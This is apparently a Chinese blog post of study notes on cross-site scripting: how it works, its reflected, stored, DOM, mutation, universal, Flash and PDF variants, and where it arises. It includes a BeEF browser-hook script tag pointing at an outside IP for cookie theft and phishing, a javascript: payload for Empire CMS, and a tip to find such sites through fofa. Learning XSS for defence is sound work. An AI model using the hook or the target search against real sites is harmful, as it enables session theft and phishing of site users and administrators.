XSS-2
——— 鲁迅曾经说过,乱点链接的人就该中马。
XSS(跨站脚本攻击)Cross-Site Scripting
XSS原理:
接收输入数据
接收后输出数据
将接收到的数据进行页面显示,数据一旦是js代码,将会被调用执行实现XSS攻击
对人(管理员,站长)的攻击——-xss攻击
分类:
1、反射型:(非持久型)恶意链接
拼接语句
—-一次性
2、存储型:(持久型)
—-持久
3、 DOM xss(接收输出均在js实现,后期构造在HTML页面)
修改页面DOM节点行成xss
document.
beef-xss搭建
钓鱼服务器
加载<script src="http://47.94.236.117:3000/hook.js"><script>
=cookie获取
跳转指向
社工钓鱼
配合漏洞
帝国cms
网站:
url=javascript:alert(1)
fofa.info搜“Empirecms”
=================产生:
数据交互的地方
留言板
评论
文章编辑
文章发布
数据显示受我控制
XSS分类:
》–mxss(突变型xss)
原来payload的无害代码,由于一些因素,反编码导致payload变异,
导致,代码重新编译解析.
–提交已经被转译的xss代码–》预览编译重新加载xss代码,执行
过滤后通过分享,转载,预览等激活
》–uxss(通用型xss)
浏览器漏洞
》–flash XSS
swf 与js代码的调用
白盒:swf下载后反编译审计
黑盒:
swf下载后反编译审计
爬虫,目录扫描探针到
反编译
PDF:
创建PDF,加入JS动作
通过文件长传获取直连
直连地址访问后触发
利用条件过时的
。。。。。。。。。。略
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 💫YaaBlog!